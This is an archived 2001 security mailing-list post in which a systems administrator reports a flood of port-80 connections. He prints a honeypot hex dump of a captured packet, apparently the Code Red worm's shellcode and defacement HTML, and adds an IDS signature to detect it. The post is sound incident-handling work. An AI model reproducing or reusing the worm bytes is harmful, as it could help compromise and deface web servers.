Strange web traffic

From: Scott Nursten (scott.nurstenat_private)
Date: Tue Jul 17 2001 - 11:22:43 PDT

  • Next message: Scott Nursten: "[Fwd: Re: Strange web traffic]"

    Hi guys, 
    
    From Thursday last week, I have had thousands (21296) of attempted connects from thousands (7650) of hosts to port 80 on a host on my network that does not have a web server running. I decided to open this up on my firewall and setup a small honeypot to see what the traffic was about. Lo and behold:
    
    
    18:59:07.487672 210.239.180.224.32769 > 194.130.109.164.80: P [tcp sum ok] 2925:4040(1115) ack 1 win 17520 (DF) (ttl 104, id 46743, len 1155)
    0x0000   4500 0483 b697 4000 6806 9fe6 d2ef b4e0        E.....@.h.......
    0x0010   c282 6da4 8001 0050 c56d 3b34 c6fa 9e83        ..m....P.m;4....
    0x0020   5018 4470 5da3 0000 ff8b 8d64 feff ff0f        P.Dp]......d....
    0x0030   be11 85d2 7402 ebd3 8bf4 6a00 8b85 4cfe        ....t.....j...L.
    0x0040   ffff 508b 4d08 8b51 6452 8b85 78fe ffff        ..P.M..QdR..x...
    0x0050   50ff 95c0 feff ff3b f490 434b 434b c785        P......;..CKCK..
    0x0060   4cfe ffff 0000 0000 8b8d 68fe ffff 83c1        L.........h.....
    0x0070   0789 8d64 feff ffeb 1e8b 9564 feff ff83        ...d.......d....
    0x0080   c201 8995 64fe ffff 8b85 4cfe ffff 83c0        ....d.....L.....
    0x0090   0189 854c feff ff8b 8d64 feff ff0f be11        ...L.....d......
    0x00a0   85d2 7402 ebd3 8bf4 6a00 8b85 4cfe ffff        ..t.....j...L...
    0x00b0   508b 8d68 feff ff83 c107 518b 9578 feff        P..h......Q..x..
    0x00c0   ff52 ff95 c0fe ffff 3bf4 9043 4b43 4b8b        .R......;..CKCK.
    0x00d0   4508 8b48 7089 8d4c feff ff8b f46a 008b        E..Hp..L.....j..
    0x00e0   954c feff ff52 8b45 088b 4878 518b 9578        .L...R.E..HxQ..x
    0x00f0   feff ff52 ff95 c0fe ffff 3bf4 9043 4b43        ...R......;..CKC
    0x0100   4bc6 85fc feff ff00 8bf4 6a00 6800 0100        K.........j.h...
    0x0110   008d 85fc feff ff50 8b8d 78fe ffff 51ff        .......P..x...Q.
    0x0120   95c4 feff ff3b f490 434b 434b 8985 4cfe        .....;..CKCK..L.
    0x0130   ffff 8bf4 8b95 78fe ffff 52ff 95c8 feff        ......x...R.....
    0x0140   ff3b f490 434b 434b e90c fbff ffeb fee8        .;..CKCK........
    0x0150   8cf5 ffff eb30 5883 c005 5557 5356 506a        .....0X...UWSVPj
    0x0160   3c8b f083 c60c 5668 0001 0000 ff70 08ff        <.....Vh.....p..
    0x0170   7424 28ff 1058 50ff 7424 18ff 5004 585e        t$(..XP.t$..P.X^
    0x0180   5b5f 5dff 2090 e8cb ffff ffe8 7bf9 ffff        [_].........{...
    0x0190   b878 5634 12b8 7856 3412 b878 5634 12b8        .xV4..xV4..xV4..
    0x01a0   7856 3412 b878 5634 1258 508b bd68 feff        xV4..xV4.XP..h..
    0x01b0   ff89 47f2 c38b 4424 0c05 b800 0000 c700        ..G...D$........
    0x01c0   2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f        *.L.3.........Lo
    0x01d0   6164 4c69 6272 6172 7941 0047 6574 5379        adLibraryA.GetSy
    0x01e0   7374 656d 5469 6d65 0043 7265 6174 6554        stemTime.CreateT
    0x01f0   6872 6561 6400 4372 6561 7465 4669 6c65        hread.CreateFile
    0x0200   4100 536c 6565 7000 4765 7453 7973 7465        A.Sleep.GetSyste
    0x0210   6d44 6566 6175 6c74 4c61 6e67 4944 0056        mDefaultLangID.V
    0x0220   6972 7475 616c 5072 6f74 6563 7400 0969        irtualProtect..i
    0x0230   6e66 6f63 6f6d 6d2e 646c 6c00 5463 7053        nfocomm.dll.TcpS
    0x0240   6f63 6b53 656e 6400 0957 5332 5f33 322e        ockSend..WS2_32.
    0x0250   646c 6c00 736f 636b 6574 0063 6f6e 6e65        dll.socket.conne
    0x0260   6374 0073 656e 6400 7265 6376 0063 6c6f        ct.send.recv.clo
    0x0270   7365 736f 636b 6574 0009 7733 7376 632e        sesocket..w3svc.
    0x0280   646c 6c00 0047 4554 2000 3f00 2020 4854        dll..GET..?...HT
    0x0290   5450 2f31 2e30 0d0a 436f 6e74 656e 742d        TP/1.0..Content-
    0x02a0   7479 7065 3a20 7465 7874 2f78 6d6c 0a48        type:.text/xml.H
    0x02b0   4f53 543a 7777 772e 776f 726d 2e63 6f6d        OST:www.worm.com
    0x02c0   0a20 4163 6365 7074 3a20 2a2f 2a0a 436f        ..Accept:.*/*.Co
    0x02d0   6e74 656e 742d 6c65 6e67 7468 3a20 3335        ntent-length:.35
    0x02e0   3639 200d 0a0d 0a00 633a 5c6e 6f74 776f        69......c:\notwo
    0x02f0   726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c        rm.LMTH..<html><
    0x0300   6865 6164 3e3c 6d65 7461 2068 7474 702d        head><meta.http-
    0x0310   6571 7569 763d 2243 6f6e 7465 6e74 2d54        equiv="Content-T
    0x0320   7970 6522 2063 6f6e 7465 6e74 3d22 7465        ype".content="te
    0x0330   7874 2f68 746d 6c3b 2063 6861 7273 6574        xt/html;.charset
    0x0340   3d65 6e67 6c69 7368 223e 3c74 6974 6c65        =english"><title
    0x0350   3e48 454c 4c4f 213c 2f74 6974 6c65 3e3c        >HELLO!</title><
    0x0360   2f68 6561 643e 3c62 6164 793e 3c68 7220        /head><bady><hr.
    0x0370   7369 7a65 3d35 3e3c 666f 6e74 2063 6f6c        size=5><font.col
    0x0380   6f72 3d22 7265 6422 3e3c 7020 616c 6967        or="red"><p.alig
    0x0390   6e3d 2263 656e 7465 7222 3e57 656c 636f        n="center">Welco
    0x03a0   6d65 2074 6f20 6874 7470 3a2f 2f77 7777        me.to.http://www
    0x03b0   2e77 6f72 6d2e 636f 6d20 213c 6272 3e3c        .worm.com.!<br><
    0x03c0   6272 3e48 6163 6b65 6420 4279 2043 6869        br>Hacked.By.Chi
    0x03d0   6e65 7365 213c 2f66 6f6e 743e 3c2f 6872        nese!</font></hr
    0x03e0   3e3c 2f62 6164 793e 3c2f 6874 6d6c 3e20        ></bady></html>.
    0x03f0   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0400   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0410   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0420   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0430   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0440   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0450   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0460   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0470   2020 2020 2020 2020 2020 2020 2020 2020        ................
    0x0480   2020 20                                        ...
    
    
    Any ideas? If this is a worm, it's already got 7650 hosts. I'm logging this all the logs on my IDS hosts with the following signature:
    alert TCP $EXTERNAL any -> $INTERNAL any (msg: "Hacked by Chinese"; dsize: >1000; flags: P+; content: "|2e776f72 6d2e636f 6d20213c 62723e3c|";)
    
    Having just written the rule and popped it in the IDS, I've seen 34 connections from 11 different hosts. Looks bad. 
    
    Rgds, 
    
    -- 
    
    Scott Nursten - Systems Administrator
    ----------------------------------------------
    ddi:   +44 (0) 1293 744 122
    work:  +44 (0) 1293 402 040
    fax:   +44 (0) 1293 402 050
    email: scottnat_private
    wwweb: http://www.streetsonline.co.uk
    ----------------------------------------------
    
    			"Without order nothing can exist - without chaos nothing can evolve."
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 12:44:18 PDT